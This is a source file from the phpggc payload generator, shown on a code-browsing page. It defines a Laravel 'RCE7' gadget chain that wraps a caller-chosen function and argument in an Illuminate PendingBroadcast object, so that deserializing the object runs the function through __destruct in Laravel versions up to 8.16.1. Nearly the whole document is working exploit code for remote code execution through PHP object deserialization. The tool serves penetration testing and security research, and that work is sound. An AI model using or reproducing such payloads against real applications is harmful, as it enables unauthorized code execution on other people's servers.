Codebase list phpggc / 0b015796-5a62-4bd6-b710-4002de0e5ca2/main gadgetchains / Laravel / RCE / 7 / chain.php
0b015796-5a62-4bd6-b710-4002de0e5ca2/main

Tree @0b015796-5a62-4bd6-b710-4002de0e5ca2/main (Download .tar.gz)

chain.php @0b015796-5a62-4bd6-b710-4002de0e5ca2/mainraw · history · blame

<?php

namespace GadgetChain\Laravel;

class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '? <= 8.16.1'; // will test for more version at a later date
    public static $vector = '__destruct';
    public static $author = 'whira';
    public static $information = 'This chain throws a RuntimeException immediately after code execution.';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \Illuminate\Broadcasting\PendingBroadcast(
            $function, 
            $parameter
        );
    }
}